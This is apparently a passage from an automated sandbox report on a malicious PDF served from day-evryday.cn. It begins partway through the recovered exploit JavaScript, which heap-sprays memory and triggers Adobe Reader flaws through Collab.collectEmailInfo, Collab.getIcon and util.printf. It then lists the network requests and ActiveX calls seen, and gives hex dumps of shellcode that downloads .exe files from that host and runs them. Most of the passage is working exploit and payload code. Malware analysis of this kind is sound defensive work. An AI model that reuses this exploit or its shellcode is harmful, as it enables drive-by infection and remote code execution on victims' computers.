%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961%u632E%u2F6E %u6F6B%u7977%u2E32%u7865%u0065%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961%u632E %u2F6E%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000"); var mem_array = new Array(); var cc = 0x0c0c0c0c; var addr = 0x400000; var sc_len = shellcode.length * 2; var len = addr - (sc_len + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var count2 = (cc - 0x400000) / addr; for (var count = 0; count < count2; count ++ ){ mem_array[count] = yarsp + shellcode; } var overflow = unescape("%u0c0c%u0c0c"); while (overflow.length < 44952){ overflow += overflow; } this .collabStore = Collab.collectEmailInfo({ subj : "", msg : overflow } ); } function collab_geticon(){ if (app.doc.Collab.getIcon){ var arry = new Array(); var vvpethya = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961%u632E%u2F6E %u6965%u706D%u7674%u2E32%u7865%u0065%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961 %u632E%u2F6E%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000"); var hWq500CN = vvpethya.length * 2; var len = 0x400000 - (hWq500CN + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){ arry[vqcQD96y] = yarsp + vvpethya; } var tUMhNbGw = unescape("%09"); while (tUMhNbGw.length < 0x4000){ tUMhNbGw += tUMhNbGw; } tUMhNbGw = "N." + tUMhNbGw; app.doc.Collab.getIcon(tUMhNbGw); } } function pdf_start(){ var version = app.viewerVersion.toString(); version = version.replace(/\D/g, ''); var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2)); if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)){ util_printf(); } if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)){ collab_email(); } if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){ collab_geticon(); } } pdf_start();
Writes
No writes.Network Activity
Requests
| URL | Status | Content Type |
|---|---|---|
| http://day-evryday.cn/news.php | 200 | text/html |
| about:blank | 200 | text/html |
| http://day-evryday.cn/giquv.pdf | 200 | application/pdf |
| http://lib.ru/WEBMASTER/robots.txt | 200 | text/html |
Redirects
No redirects.ActiveX controls
-
0955AC62-BF2E-4CBA-A2B9-A63F772D46CF Name Value Count Attributes width 1
1 height 1
1 data ./cdnyds.jpg
1 -
AcroPDF.PDF No attribute setting or method call detected -
AcrobatJavaScript Name Arg0 Arg1 Count Methods Collab.getIcon N...............................................................................
................................................................................
................................................................................
other 15840 bytes
................................................................................
................................................................................
................................................................................
..................................................................1 N...............................................................................
................................................................................
................................................................................
other 15840 bytes
................................................................................
................................................................................
................................................................................
..................................................................1 Collab.collectEmailInfo ''
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c
other 196512 bytes
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c1 ''
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c
other 196512 bytes
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c1 util.printf %45000f
1.3E295
2 -
ShockwaveFlash.ShockwaveFlash.7 Name Arg0 Count Methods GetVariable $version
1 -
snpvw.Snapshot Viewer Control.1 Name Count Methods PrintSnapshot 1 Name Value Count Attributes ShowNavigationButtons false
1 Zoom 0.0
1 CompressedPath c:/Program Files/Outlook Express/wab.exe
1 AllowContextMenu false
1 SnapshotPath http://day-evryday.cn/fgnqv7.exe
1 -
clsid:ca8a9780-280d-11cf-a24d-444553540000 No attribute setting or method call detected
Shellcode and Malware
| Hexadecimal | ASCII |
|---|---|
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 73 64 67 73 67 35 2e 65 78 65 00 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 | .....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /day-evryday.cn/ sdgsg5.exe.http: //day-evryday.cn /click.php?r=. |
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 63 65 6d 72 75 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 | .....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /day-evryday.cn/ cemru2.exe.http: //day-evryday.cn /click.php?r=. |
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 69 6c 70 71 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 00 | .....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /day-evryday.cn/ ilpq2.exe.http:/ /day-evryday.cn/ click.php?r=.. |
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 6b 6f 77 79 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 00 | .....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /day-evryday.cn/ kowy2.exe.http:/ /day-evryday.cn/ click.php?r=.. |
